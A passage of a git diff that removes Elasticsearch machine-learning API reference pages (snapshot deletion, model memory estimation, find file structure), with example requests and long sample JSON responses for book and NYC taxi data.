- -[[ml-delete-snapshot-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=snapshot-id] - -[[ml-delete-snapshot-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/anomaly_detectors/farequote/model_snapshots/1491948163 --------------------------------------------------- -// TEST[skip:todo] - -When the snapshot is deleted, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/estimate-model-memory.asciidoc b/docs/reference/ml/anomaly-detection/apis/estimate-model-memory.asciidoc deleted file mode 100644 index c4759a8d2c9..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/estimate-model-memory.asciidoc +++ /dev/null @@ -1,94 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-estimate-model-memory]] -= Estimate {anomaly-jobs} model memory API -++++ -Estimate model memory -++++ - -Makes an estimation of the memory usage for an {anomaly-job} model. It -is based on analysis configuration details for the job and cardinality estimates for the -fields it references. - - -[[ml-estimate-model-memory-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors/_estimate_model_memory` - -[[ml-estimate-model-memory-prereqs]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following privileges: - -* `manage_ml` or cluster: `manage` - -For more information, see <> and -{ml-docs-setup-privileges}. - - -[[ml-estimate-model-memory-request-body]] -== {api-request-body-title} - -`analysis_config`:: -(Required, object) -For a list of the properties that you can specify in the `analysis_config` -component of the body of this API, see <>. - -`max_bucket_cardinality`:: -(Required^\*^, object) -Estimates of the highest cardinality in a single bucket that is observed for -influencer fields over the time period that the job analyzes data. To produce a -good answer, values must be provided for all influencer fields. Providing values -for fields that are not listed as `influencers` has no effect on the estimation. + -^*^It can be omitted from the request if there are no `influencers`. - -`overall_cardinality`:: -(Required^\*^, object) -Estimates of the cardinality that is observed for fields over the whole time -period that the job analyzes data. To produce a good answer, values must be -provided for fields referenced in the `by_field_name`, `over_field_name` and -`partition_field_name` of any detectors. Providing values for other fields has -no effect on the estimation. + -^*^It can be omitted from the request if no detectors have a `by_field_name`, -`over_field_name` or `partition_field_name`. 
- -[[ml-estimate-model-memory-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/_estimate_model_memory -{ - "analysis_config": { - "bucket_span": "5m", - "detectors": [ - { - "function": "sum", - "field_name": "bytes", - "by_field_name": "status", - "partition_field_name": "app" - } - ], - "influencers": [ "source_ip", "dest_ip" ] - }, - "overall_cardinality": { - "status": 10, - "app": 50 - }, - "max_bucket_cardinality": { - "source_ip": 300, - "dest_ip": 30 - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -The estimate returns the following result: - -[source,console-result] ----- -{ - "model_memory_estimate": "21mb" -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/find-file-structure.asciidoc b/docs/reference/ml/anomaly-detection/apis/find-file-structure.asciidoc deleted file mode 100644 index a1c7516c018..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/find-file-structure.asciidoc +++ /dev/null @@ -1,1954 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ml-find-file-structure]] -= Find file structure API -++++ -Find file structure -++++ - -experimental[] - -Finds the structure of a text file. The text file must contain data that is -suitable to be ingested into {es}. - - -[[ml-find-file-structure-request]] -== {api-request-title} - -`POST _ml/find_file_structure` - - -[[ml-find-file-structure-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml` or -`monitor` cluster privileges to use this API. See -<> and -{ml-docs-setup-privileges}. - - -[[ml-find-file-structure-desc]] -== {api-description-title} - -This API provides a starting point for ingesting data into {es} in a format that -is suitable for subsequent use with other {ml} functionality. - -Unlike other {es} endpoints, the data that is posted to this endpoint does not -need to be UTF-8 encoded and in JSON format. It must, however, be text; binary -file formats are not currently supported. - -The response from the API contains: - -* A couple of messages from the beginning of the file. -* Statistics that reveal the most common values for all fields detected within - the file and basic numeric statistics for numeric fields. -* Information about the structure of the file, which is useful when you write - ingest configurations to index the file contents. -* Appropriate mappings for an {es} index, which you could use to ingest the file - contents. - -All this information can be calculated by the structure finder with no guidance. -However, you can optionally override some of the decisions about the file -structure by specifying one or more query parameters. - -Details of the output can be seen in the -<>. - -If the structure finder produces unexpected results for a particular file, -specify the `explain` query parameter. It causes an `explanation` to appear in -the response, which should help in determining why the returned structure was -chosen. - - -[[ml-find-file-structure-query-parms]] -== {api-query-parms-title} - -`charset`:: - (Optional, string) The file's character set. It must be a character set that - is supported by the JVM that {es} uses. For example, `UTF-8`, `UTF-16LE`, - `windows-1252`, or `EUC-JP`. If this parameter is not specified, the structure - finder chooses an appropriate character set. 
- -`column_names`:: - (Optional, string) If you have set `format` to `delimited`, you can specify - the column names in a comma-separated list. If this parameter is not specified, - the structure finder uses the column names from the header row of the file. If - the file does not have a header role, columns are named "column1", "column2", - "column3", etc. - -`delimiter`:: - (Optional, string) If you have set `format` to `delimited`, you can specify - the character used to delimit the values in each row. Only a single character - is supported; the delimiter cannot have multiple characters. By default, the - API considers the following possibilities: comma, tab, semi-colon, and pipe - (`|`). In this default scenario, all rows must have the same number of fields - for the delimited format to be detected. If you specify a delimiter, up to 10% - of the rows can have a different number of columns than the first row. - -`explain`:: - (Optional, Boolean) If this parameter is set to `true`, the response includes - a field named `explanation`, which is an array of strings that indicate how - the structure finder produced its result. The default value is `false`. - -`format`:: -(Optional, string) The high level structure of the file. Valid values are -`ndjson`, `xml`, `delimited`, and `semi_structured_text`. By default, the -API chooses the format. In this default scenario, all rows must -have the same number of fields for a delimited format to be detected. If the -`format` is set to `delimited` and the `delimiter` is not set, however, the -API tolerates up to 5% of rows that have a different number of -columns than the first row. - -`grok_pattern`:: - (Optional, string) If you have set `format` to `semi_structured_text`, you can - specify a Grok pattern that is used to extract fields from every message in - the file. The name of the timestamp field in the Grok pattern must match what - is specified in the `timestamp_field` parameter. If that parameter is not - specified, the name of the timestamp field in the Grok pattern must match - "timestamp". If `grok_pattern` is not specified, the structure finder creates - a Grok pattern. - -`has_header_row`:: - (Optional, Boolean) If you have set `format` to `delimited`, you can use this - parameter to indicate whether the column names are in the first row of the - file. If this parameter is not specified, the structure finder guesses based - on the similarity of the first row of the file to other rows. - -`line_merge_size_limit`:: - (Optional, unsigned integer) The maximum number of characters in a message - when lines are merged to form messages while analyzing semi-structured files. - The default is `10000`. If you have extremely long messages you may need to - increase this, but be aware that this may lead to very long processing times - if the way to group lines into messages is misdetected. - -`lines_to_sample`:: - (Optional, unsigned integer) The number of lines to include in the structural - analysis, starting from the beginning of the file. The minimum is 2; the - default is `1000`. If the value of this parameter is greater than the number - of lines in the file, the analysis proceeds (as long as there are at least two - lines in the file) for all of the lines. + -+ --- -NOTE: The number of lines and the variation of the lines affects the speed of -the analysis. For example, if you upload a log file where the first 1000 lines -are all variations on the same message, the analysis will find more commonality -than would be seen with a bigger sample. 
If possible, however, it is more -efficient to upload a sample file with more variety in the first 1000 lines than -to request analysis of 100000 lines to achieve some variety. --- - -`quote`:: - (Optional, string) If you have set `format` to `delimited`, you can specify - the character used to quote the values in each row if they contain newlines or - the delimiter character. Only a single character is supported. If this - parameter is not specified, the default value is a double quote (`"`). If your - delimited file format does not use quoting, a workaround is to set this - argument to a character that does not appear anywhere in the sample. - -`should_trim_fields`:: - (Optional, Boolean) If you have set `format` to `delimited`, you can specify - whether values between delimiters should have whitespace trimmed from them. If - this parameter is not specified and the delimiter is pipe (`|`), the default - value is `true`. Otherwise, the default value is `false`. - -`timeout`:: - (Optional, <>) Sets the maximum amount of time that the - structure analysis make take. If the analysis is still running when the - timeout expires then it will be aborted. The default value is 25 seconds. - -`timestamp_field`:: - (Optional, string) The name of the field that contains the primary timestamp - of each record in the file. In particular, if the file were ingested into an - index, this is the field that would be used to populate the `@timestamp` field. -+ --- -If the `format` is `semi_structured_text`, this field must match the name of the -appropriate extraction in the `grok_pattern`. Therefore, for semi-structured -file formats, it is best not to specify this parameter unless `grok_pattern` is -also specified. - -For structured file formats, if you specify this parameter, the field must exist -within the file. - -If this parameter is not specified, the structure finder makes a decision about -which field (if any) is the primary timestamp field. For structured file -formats, it is not compulsory to have a timestamp in the file. --- - -`timestamp_format`:: - (Optional, string) The Java time format of the timestamp field in the file. -+ --- -Only a subset of Java time format letter groups are supported: - -* `a` -* `d` -* `dd` -* `EEE` -* `EEEE` -* `H` -* `HH` -* `h` -* `M` -* `MM` -* `MMM` -* `MMMM` -* `mm` -* `ss` -* `XX` -* `XXX` -* `yy` -* `yyyy` -* `zzz` - -Additionally `S` letter groups (fractional seconds) of length one to nine are -supported providing they occur after `ss` and separated from the `ss` by a `.`, -`,` or `:`. Spacing and punctuation is also permitted with the exception of `?`, -newline and carriage return, together with literal text enclosed in single -quotes. For example, `MM/dd HH.mm.ss,SSSSSS 'in' yyyy` is a valid override -format. - -One valuable use case for this parameter is when the format is semi-structured -text, there are multiple timestamp formats in the file, and you know which -format corresponds to the primary timestamp, but you do not want to specify the -full `grok_pattern`. Another is when the timestamp format is one that the -structure finder does not consider by default. - -If this parameter is not specified, the structure finder chooses the best -format from a built-in set. 
- -The following table provides the appropriate `timeformat` values for some example timestamps: - -|=== -| Timeformat | Presentation - -| yyyy-MM-dd HH:mm:ssZ | 2019-04-20 13:15:22+0000 -| EEE, d MMM yyyy HH:mm:ss Z | Sat, 20 Apr 2019 13:15:22 +0000 -| dd.MM.yy HH:mm:ss.SSS | 20.04.19 13:15:22.285 -|=== - -See -https://docs.oracle.com/javase/8/docs/api/java/time/format/DateTimeFormatter.html[the Java date/time format documentation] -for more information about date and time format syntax. - --- - -[[ml-find-file-structure-request-body]] -== {api-request-body-title} - -The text file that you want to analyze. It must contain data that is suitable to -be ingested into {es}. It does not need to be in JSON format and it does not -need to be UTF-8 encoded. The size is limited to the {es} HTTP receive buffer -size, which defaults to 100 Mb. - -[[ml-find-file-structure-examples]] -== {api-examples-title} - -[[ml-find-file-structure-example-nld-json]] -=== Ingesting newline-delimited JSON - -Suppose you have a newline-delimited JSON file that contains information about -some books. You can send the contents to the `find_file_structure` endpoint: - -[source,console] ----- -POST _ml/find_file_structure -{"name": "Leviathan Wakes", "author": "James S.A. Corey", "release_date": "2011-06-02", "page_count": 561} -{"name": "Hyperion", "author": "Dan Simmons", "release_date": "1989-05-26", "page_count": 482} -{"name": "Dune", "author": "Frank Herbert", "release_date": "1965-06-01", "page_count": 604} -{"name": "Dune Messiah", "author": "Frank Herbert", "release_date": "1969-10-15", "page_count": 331} -{"name": "Children of Dune", "author": "Frank Herbert", "release_date": "1976-04-21", "page_count": 408} -{"name": "God Emperor of Dune", "author": "Frank Herbert", "release_date": "1981-05-28", "page_count": 454} -{"name": "Consider Phlebas", "author": "Iain M. Banks", "release_date": "1987-04-23", "page_count": 471} -{"name": "Pandora's Star", "author": "Peter F. Hamilton", "release_date": "2004-03-02", "page_count": 768} -{"name": "Revelation Space", "author": "Alastair Reynolds", "release_date": "2000-03-15", "page_count": 585} -{"name": "A Fire Upon the Deep", "author": "Vernor Vinge", "release_date": "1992-06-01", "page_count": 613} -{"name": "Ender's Game", "author": "Orson Scott Card", "release_date": "1985-06-01", "page_count": 324} -{"name": "1984", "author": "George Orwell", "release_date": "1985-06-01", "page_count": 328} -{"name": "Fahrenheit 451", "author": "Ray Bradbury", "release_date": "1953-10-15", "page_count": 227} -{"name": "Brave New World", "author": "Aldous Huxley", "release_date": "1932-06-01", "page_count": 268} -{"name": "Foundation", "author": "Isaac Asimov", "release_date": "1951-06-01", "page_count": 224} -{"name": "The Giver", "author": "Lois Lowry", "release_date": "1993-04-26", "page_count": 208} -{"name": "Slaughterhouse-Five", "author": "Kurt Vonnegut", "release_date": "1969-06-01", "page_count": 275} -{"name": "The Hitchhiker's Guide to the Galaxy", "author": "Douglas Adams", "release_date": "1979-10-12", "page_count": 180} -{"name": "Snow Crash", "author": "Neal Stephenson", "release_date": "1992-06-01", "page_count": 470} -{"name": "Neuromancer", "author": "William Gibson", "release_date": "1984-07-01", "page_count": 271} -{"name": "The Handmaid's Tale", "author": "Margaret Atwood", "release_date": "1985-06-01", "page_count": 311} -{"name": "Starship Troopers", "author": "Robert A. 
Heinlein", "release_date": "1959-12-01", "page_count": 335} -{"name": "The Left Hand of Darkness", "author": "Ursula K. Le Guin", "release_date": "1969-06-01", "page_count": 304} -{"name": "The Moon is a Harsh Mistress", "author": "Robert A. Heinlein", "release_date": "1966-04-01", "page_count": 288} ----- - -If the request does not encounter errors, you receive the following result: - -[source,console-result] ----- -{ - "num_lines_analyzed" : 24, <1> - "num_messages_analyzed" : 24, <2> - "sample_start" : "{\"name\": \"Leviathan Wakes\", \"author\": \"James S.A. Corey\", \"release_date\": \"2011-06-02\", \"page_count\": 561}\n{\"name\": \"Hyperion\", \"author\": \"Dan Simmons\", \"release_date\": \"1989-05-26\", \"page_count\": 482}\n", <3> - "charset" : "UTF-8", <4> - "has_byte_order_marker" : false, <5> - "format" : "ndjson", <6> - "timestamp_field" : "release_date", <7> - "joda_timestamp_formats" : [ <8> - "ISO8601" - ], - "java_timestamp_formats" : [ <9> - "ISO8601" - ], - "need_client_timezone" : true, <10> - "mappings" : { <11> - "properties" : { - "@timestamp" : { - "type" : "date" - }, - "author" : { - "type" : "keyword" - }, - "name" : { - "type" : "keyword" - }, - "page_count" : { - "type" : "long" - }, - "release_date" : { - "type" : "date", - "format" : "iso8601" - } - } - }, - "ingest_pipeline" : { - "description" : "Ingest pipeline created by file structure finder", - "processors" : [ - { - "date" : { - "field" : "release_date", - "timezone" : "{{ event.timezone }}", - "formats" : [ - "ISO8601" - ] - } - } - ] - }, - "field_stats" : { <12> - "author" : { - "count" : 24, - "cardinality" : 20, - "top_hits" : [ - { - "value" : "Frank Herbert", - "count" : 4 - }, - { - "value" : "Robert A. Heinlein", - "count" : 2 - }, - { - "value" : "Alastair Reynolds", - "count" : 1 - }, - { - "value" : "Aldous Huxley", - "count" : 1 - }, - { - "value" : "Dan Simmons", - "count" : 1 - }, - { - "value" : "Douglas Adams", - "count" : 1 - }, - { - "value" : "George Orwell", - "count" : 1 - }, - { - "value" : "Iain M. Banks", - "count" : 1 - }, - { - "value" : "Isaac Asimov", - "count" : 1 - }, - { - "value" : "James S.A. 
Corey", - "count" : 1 - } - ] - }, - "name" : { - "count" : 24, - "cardinality" : 24, - "top_hits" : [ - { - "value" : "1984", - "count" : 1 - }, - { - "value" : "A Fire Upon the Deep", - "count" : 1 - }, - { - "value" : "Brave New World", - "count" : 1 - }, - { - "value" : "Children of Dune", - "count" : 1 - }, - { - "value" : "Consider Phlebas", - "count" : 1 - }, - { - "value" : "Dune", - "count" : 1 - }, - { - "value" : "Dune Messiah", - "count" : 1 - }, - { - "value" : "Ender's Game", - "count" : 1 - }, - { - "value" : "Fahrenheit 451", - "count" : 1 - }, - { - "value" : "Foundation", - "count" : 1 - } - ] - }, - "page_count" : { - "count" : 24, - "cardinality" : 24, - "min_value" : 180, - "max_value" : 768, - "mean_value" : 387.0833333333333, - "median_value" : 329.5, - "top_hits" : [ - { - "value" : 180, - "count" : 1 - }, - { - "value" : 208, - "count" : 1 - }, - { - "value" : 224, - "count" : 1 - }, - { - "value" : 227, - "count" : 1 - }, - { - "value" : 268, - "count" : 1 - }, - { - "value" : 271, - "count" : 1 - }, - { - "value" : 275, - "count" : 1 - }, - { - "value" : 288, - "count" : 1 - }, - { - "value" : 304, - "count" : 1 - }, - { - "value" : 311, - "count" : 1 - } - ] - }, - "release_date" : { - "count" : 24, - "cardinality" : 20, - "earliest" : "1932-06-01", - "latest" : "2011-06-02", - "top_hits" : [ - { - "value" : "1985-06-01", - "count" : 3 - }, - { - "value" : "1969-06-01", - "count" : 2 - }, - { - "value" : "1992-06-01", - "count" : 2 - }, - { - "value" : "1932-06-01", - "count" : 1 - }, - { - "value" : "1951-06-01", - "count" : 1 - }, - { - "value" : "1953-10-15", - "count" : 1 - }, - { - "value" : "1959-12-01", - "count" : 1 - }, - { - "value" : "1965-06-01", - "count" : 1 - }, - { - "value" : "1966-04-01", - "count" : 1 - }, - { - "value" : "1969-10-15", - "count" : 1 - } - ] - } - } -} ----- -// TESTRESPONSE[s/"sample_start" : ".*",/"sample_start" : "$body.sample_start",/] -// The substitution is because the "file" is pre-processed by the test harness, -// so the fields may get reordered in the JSON the endpoint sees - -<1> `num_lines_analyzed` indicates how many lines of the file were analyzed. -<2> `num_messages_analyzed` indicates how many distinct messages the lines contained. - For NDJSON, this value is the same as `num_lines_analyzed`. For other file - formats, messages can span several lines. -<3> `sample_start` reproduces the first two messages in the file verbatim. This - may help to diagnose parse errors or accidental uploads of the wrong file. -<4> `charset` indicates the character encoding used to parse the file. -<5> For UTF character encodings, `has_byte_order_marker` indicates whether the - file begins with a byte order marker. -<6> `format` is one of `ndjson`, `xml`, `delimited` or `semi_structured_text`. -<7> The `timestamp_field` names the field considered most likely to be the - primary timestamp of each document. -<8> `joda_timestamp_formats` are used to tell Logstash how to parse timestamps. -<9> `java_timestamp_formats` are the Java time formats recognized in the time - fields. Elasticsearch mappings and Ingest pipeline use this format. -<10> If a timestamp format is detected that does not include a timezone, - `need_client_timezone` will be `true`. The server that parses the file must - therefore be told the correct timezone by the client. -<11> `mappings` contains some suitable mappings for an index into which the data - could be ingested. 
In this case, the `release_date` field has been given a - `keyword` type as it is not considered specific enough to convert to the - `date` type. -<12> `field_stats` contains the most common values of each field, plus basic - numeric statistics for the numeric `page_count` field. This information - may provide clues that the data needs to be cleaned or transformed prior - to use by other {ml} functionality. - - -[[ml-find-file-structure-example-nyc]] -=== Finding the structure of NYC yellow cab example data - -The next example shows how it's possible to find the structure of some New York -City yellow cab trip data. The first `curl` command downloads the data, the -first 20000 lines of which are then piped into the `find_file_structure` -endpoint. The `lines_to_sample` query parameter of the endpoint is set to 20000 -to match what is specified in the `head` command. - -[source,js] ----- -curl -s "s3.amazonaws.com/nyc-tlc/trip+data/yellow_tripdata_2018-06.csv" | head -20000 | curl -s -H "Content-Type: application/json" -XPOST "localhost:9200/_ml/find_file_structure?pretty&lines_to_sample=20000" -T - ----- -// NOTCONSOLE -// Not converting to console because this shows how curl can be used - --- -NOTE: The `Content-Type: application/json` header must be set even though in -this case the data is not JSON. (Alternatively the `Content-Type` can be set -to any other supported by {es}, but it must be set.) --- - -If the request does not encounter errors, you receive the following result: - -[source,js] ----- -{ - "num_lines_analyzed" : 20000, - "num_messages_analyzed" : 19998, <1> - "sample_start" : "VendorID,tpep_pickup_datetime,tpep_dropoff_datetime,passenger_count,trip_distance,RatecodeID,store_and_fwd_flag,PULocationID,DOLocationID,payment_type,fare_amount,extra,mta_tax,tip_amount,tolls_amount,improvement_surcharge,total_amount\n\n1,2018-06-01 00:15:40,2018-06-01 00:16:46,1,.00,1,N,145,145,2,3,0.5,0.5,0,0,0.3,4.3\n", - "charset" : "UTF-8", - "has_byte_order_marker" : false, - "format" : "delimited", <2> - "multiline_start_pattern" : "^.*?,\"?\\d{4}-\\d{2}-\\d{2}[T ]\\d{2}:\\d{2}", - "exclude_lines_pattern" : "^\"?VendorID\"?,\"?tpep_pickup_datetime\"?,\"?tpep_dropoff_datetime\"?,\"?passenger_count\"?,\"?trip_distance\"?,\"?RatecodeID\"?,\"?store_and_fwd_flag\"?,\"?PULocationID\"?,\"?DOLocationID\"?,\"?payment_type\"?,\"?fare_amount\"?,\"?extra\"?,\"?mta_tax\"?,\"?tip_amount\"?,\"?tolls_amount\"?,\"?improvement_surcharge\"?,\"?total_amount\"?", - "column_names" : [ <3> - "VendorID", - "tpep_pickup_datetime", - "tpep_dropoff_datetime", - "passenger_count", - "trip_distance", - "RatecodeID", - "store_and_fwd_flag", - "PULocationID", - "DOLocationID", - "payment_type", - "fare_amount", - "extra", - "mta_tax", - "tip_amount", - "tolls_amount", - "improvement_surcharge", - "total_amount" - ], - "has_header_row" : true, <4> - "delimiter" : ",", <5> - "quote" : "\"", <6> - "timestamp_field" : "tpep_pickup_datetime", <7> - "joda_timestamp_formats" : [ <8> - "YYYY-MM-dd HH:mm:ss" - ], - "java_timestamp_formats" : [ <9> - "yyyy-MM-dd HH:mm:ss" - ], - "need_client_timezone" : true, <10> - "mappings" : { - "properties" : { - "@timestamp" : { - "type" : "date" - }, - "DOLocationID" : { - "type" : "long" - }, - "PULocationID" : { - "type" : "long" - }, - "RatecodeID" : { - "type" : "long" - }, - "VendorID" : { - "type" : "long" - }, - "extra" : { - "type" : "double" - }, - "fare_amount" : { - "type" : "double" - }, - "improvement_surcharge" : { - "type" : "double" - }, - "mta_tax" : { - "type" : "double" - 
}, - "passenger_count" : { - "type" : "long" - }, - "payment_type" : { - "type" : "long" - }, - "store_and_fwd_flag" : { - "type" : "keyword" - }, - "tip_amount" : { - "type" : "double" - }, - "tolls_amount" : { - "type" : "double" - }, - "total_amount" : { - "type" : "double" - }, - "tpep_dropoff_datetime" : { - "type" : "date", - "format" : "yyyy-MM-dd HH:mm:ss" - }, - "tpep_pickup_datetime" : { - "type" : "date", - "format" : "yyyy-MM-dd HH:mm:ss" - }, - "trip_distance" : { - "type" : "double" - } - } - }, - "ingest_pipeline" : { - "description" : "Ingest pipeline created by file structure finder", - "processors" : [ - { - "csv" : { - "field" : "message", - "target_fields" : [ - "VendorID", - "tpep_pickup_datetime", - "tpep_dropoff_datetime", - "passenger_count", - "trip_distance", - "RatecodeID", - "store_and_fwd_flag", - "PULocationID", - "DOLocationID", - "payment_type", - "fare_amount", - "extra", - "mta_tax", - "tip_amount", - "tolls_amount", - "improvement_surcharge", - "total_amount" - ] - } - }, - { - "date" : { - "field" : "tpep_pickup_datetime", - "timezone" : "{{ event.timezone }}", - "formats" : [ - "yyyy-MM-dd HH:mm:ss" - ] - } - }, - { - "convert" : { - "field" : "DOLocationID", - "type" : "long" - } - }, - { - "convert" : { - "field" : "PULocationID", - "type" : "long" - } - }, - { - "convert" : { - "field" : "RatecodeID", - "type" : "long" - } - }, - { - "convert" : { - "field" : "VendorID", - "type" : "long" - } - }, - { - "convert" : { - "field" : "extra", - "type" : "double" - } - }, - { - "convert" : { - "field" : "fare_amount", - "type" : "double" - } - }, - { - "convert" : { - "field" : "improvement_surcharge", - "type" : "double" - } - }, - { - "convert" : { - "field" : "mta_tax", - "type" : "double" - } - }, - { - "convert" : { - "field" : "passenger_count", - "type" : "long" - } - }, - { - "convert" : { - "field" : "payment_type", - "type" : "long" - } - }, - { - "convert" : { - "field" : "tip_amount", - "type" : "double" - } - }, - { - "convert" : { - "field" : "tolls_amount", - "type" : "double" - } - }, - { - "convert" : { - "field" : "total_amount", - "type" : "double" - } - }, - { - "convert" : { - "field" : "trip_distance", - "type" : "double" - } - }, - { - "remove" : { - "field" : "message" - } - } - ] - }, - "field_stats" : { - "DOLocationID" : { - "count" : 19998, - "cardinality" : 240, - "min_value" : 1, - "max_value" : 265, - "mean_value" : 150.26532653265312, - "median_value" : 148, - "top_hits" : [ - { - "value" : 79, - "count" : 760 - }, - { - "value" : 48, - "count" : 683 - }, - { - "value" : 68, - "count" : 529 - }, - { - "value" : 170, - "count" : 506 - }, - { - "value" : 107, - "count" : 468 - }, - { - "value" : 249, - "count" : 457 - }, - { - "value" : 230, - "count" : 441 - }, - { - "value" : 186, - "count" : 432 - }, - { - "value" : 141, - "count" : 409 - }, - { - "value" : 263, - "count" : 386 - } - ] - }, - "PULocationID" : { - "count" : 19998, - "cardinality" : 154, - "min_value" : 1, - "max_value" : 265, - "mean_value" : 153.4042404240424, - "median_value" : 148, - "top_hits" : [ - { - "value" : 79, - "count" : 1067 - }, - { - "value" : 230, - "count" : 949 - }, - { - "value" : 148, - "count" : 940 - }, - { - "value" : 132, - "count" : 897 - }, - { - "value" : 48, - "count" : 853 - }, - { - "value" : 161, - "count" : 820 - }, - { - "value" : 234, - "count" : 750 - }, - { - "value" : 249, - "count" : 722 - }, - { - "value" : 164, - "count" : 663 - }, - { - "value" : 114, - "count" : 646 - } - ] - }, - "RatecodeID" : { - "count" : 19998, 
- "cardinality" : 5, - "min_value" : 1, - "max_value" : 5, - "mean_value" : 1.0656565656565653, - "median_value" : 1, - "top_hits" : [ - { - "value" : 1, - "count" : 19311 - }, - { - "value" : 2, - "count" : 468 - }, - { - "value" : 5, - "count" : 195 - }, - { - "value" : 4, - "count" : 17 - }, - { - "value" : 3, - "count" : 7 - } - ] - }, - "VendorID" : { - "count" : 19998, - "cardinality" : 2, - "min_value" : 1, - "max_value" : 2, - "mean_value" : 1.59005900590059, - "median_value" : 2, - "top_hits" : [ - { - "value" : 2, - "count" : 11800 - }, - { - "value" : 1, - "count" : 8198 - } - ] - }, - "extra" : { - "count" : 19998, - "cardinality" : 3, - "min_value" : -0.5, - "max_value" : 0.5, - "mean_value" : 0.4815981598159816, - "median_value" : 0.5, - "top_hits" : [ - { - "value" : 0.5, - "count" : 19281 - }, - { - "value" : 0, - "count" : 698 - }, - { - "value" : -0.5, - "count" : 19 - } - ] - }, - "fare_amount" : { - "count" : 19998, - "cardinality" : 208, - "min_value" : -100, - "max_value" : 300, - "mean_value" : 13.937719771977209, - "median_value" : 9.5, - "top_hits" : [ - { - "value" : 6, - "count" : 1004 - }, - { - "value" : 6.5, - "count" : 935 - }, - { - "value" : 5.5, - "count" : 909 - }, - { - "value" : 7, - "count" : 903 - }, - { - "value" : 5, - "count" : 889 - }, - { - "value" : 7.5, - "count" : 854 - }, - { - "value" : 4.5, - "count" : 802 - }, - { - "value" : 8.5, - "count" : 790 - }, - { - "value" : 8, - "count" : 789 - }, - { - "value" : 9, - "count" : 711 - } - ] - }, - "improvement_surcharge" : { - "count" : 19998, - "cardinality" : 3, - "min_value" : -0.3, - "max_value" : 0.3, - "mean_value" : 0.29915991599159913, - "median_value" : 0.3, - "top_hits" : [ - { - "value" : 0.3, - "count" : 19964 - }, - { - "value" : -0.3, - "count" : 22 - }, - { - "value" : 0, - "count" : 12 - } - ] - }, - "mta_tax" : { - "count" : 19998, - "cardinality" : 3, - "min_value" : -0.5, - "max_value" : 0.5, - "mean_value" : 0.4962246224622462, - "median_value" : 0.5, - "top_hits" : [ - { - "value" : 0.5, - "count" : 19868 - }, - { - "value" : 0, - "count" : 109 - }, - { - "value" : -0.5, - "count" : 21 - } - ] - }, - "passenger_count" : { - "count" : 19998, - "cardinality" : 7, - "min_value" : 0, - "max_value" : 6, - "mean_value" : 1.6201620162016201, - "median_value" : 1, - "top_hits" : [ - { - "value" : 1, - "count" : 14219 - }, - { - "value" : 2, - "count" : 2886 - }, - { - "value" : 5, - "count" : 1047 - }, - { - "value" : 3, - "count" : 804 - }, - { - "value" : 6, - "count" : 523 - }, - { - "value" : 4, - "count" : 406 - }, - { - "value" : 0, - "count" : 113 - } - ] - }, - "payment_type" : { - "count" : 19998, - "cardinality" : 4, - "min_value" : 1, - "max_value" : 4, - "mean_value" : 1.315631563156316, - "median_value" : 1, - "top_hits" : [ - { - "value" : 1, - "count" : 13936 - }, - { - "value" : 2, - "count" : 5857 - }, - { - "value" : 3, - "count" : 160 - }, - { - "value" : 4, - "count" : 45 - } - ] - }, - "store_and_fwd_flag" : { - "count" : 19998, - "cardinality" : 2, - "top_hits" : [ - { - "value" : "N", - "count" : 19910 - }, - { - "value" : "Y", - "count" : 88 - } - ] - }, - "tip_amount" : { - "count" : 19998, - "cardinality" : 717, - "min_value" : 0, - "max_value" : 128, - "mean_value" : 2.010959095909593, - "median_value" : 1.45, - "top_hits" : [ - { - "value" : 0, - "count" : 6917 - }, - { - "value" : 1, - "count" : 1178 - }, - { - "value" : 2, - "count" : 624 - }, - { - "value" : 3, - "count" : 248 - }, - { - "value" : 1.56, - "count" : 206 - }, - { - "value" : 1.46, - 
"count" : 205 - }, - { - "value" : 1.76, - "count" : 196 - }, - { - "value" : 1.45, - "count" : 195 - }, - { - "value" : 1.36, - "count" : 191 - }, - { - "value" : 1.5, - "count" : 187 - } - ] - }, - "tolls_amount" : { - "count" : 19998, - "cardinality" : 26, - "min_value" : 0, - "max_value" : 35, - "mean_value" : 0.2729697969796978, - "median_value" : 0, - "top_hits" : [ - { - "value" : 0, - "count" : 19107 - }, - { - "value" : 5.76, - "count" : 791 - }, - { - "value" : 10.5, - "count" : 36 - }, - { - "value" : 2.64, - "count" : 21 - }, - { - "value" : 11.52, - "count" : 8 - }, - { - "value" : 5.54, - "count" : 4 - }, - { - "value" : 8.5, - "count" : 4 - }, - { - "value" : 17.28, - "count" : 4 - }, - { - "value" : 2, - "count" : 2 - }, - { - "value" : 2.16, - "count" : 2 - } - ] - }, - "total_amount" : { - "count" : 19998, - "cardinality" : 1267, - "min_value" : -100.3, - "max_value" : 389.12, - "mean_value" : 17.499898989898995, - "median_value" : 12.35, - "top_hits" : [ - { - "value" : 7.3, - "count" : 478 - }, - { - "value" : 8.3, - "count" : 443 - }, - { - "value" : 8.8, - "count" : 420 - }, - { - "value" : 6.8, - "count" : 406 - }, - { - "value" : 7.8, - "count" : 405 - }, - { - "value" : 6.3, - "count" : 371 - }, - { - "value" : 9.8, - "count" : 368 - }, - { - "value" : 5.8, - "count" : 362 - }, - { - "value" : 9.3, - "count" : 332 - }, - { - "value" : 10.3, - "count" : 332 - } - ] - }, - "tpep_dropoff_datetime" : { - "count" : 19998, - "cardinality" : 9066, - "earliest" : "2018-05-31 06:18:15", - "latest" : "2018-06-02 02:25:44", - "top_hits" : [ - { - "value" : "2018-06-01 01:12:12", - "count" : 10 - }, - { - "value" : "2018-06-01 00:32:15", - "count" : 9 - }, - { - "value" : "2018-06-01 00:44:27", - "count" : 9 - }, - { - "value" : "2018-06-01 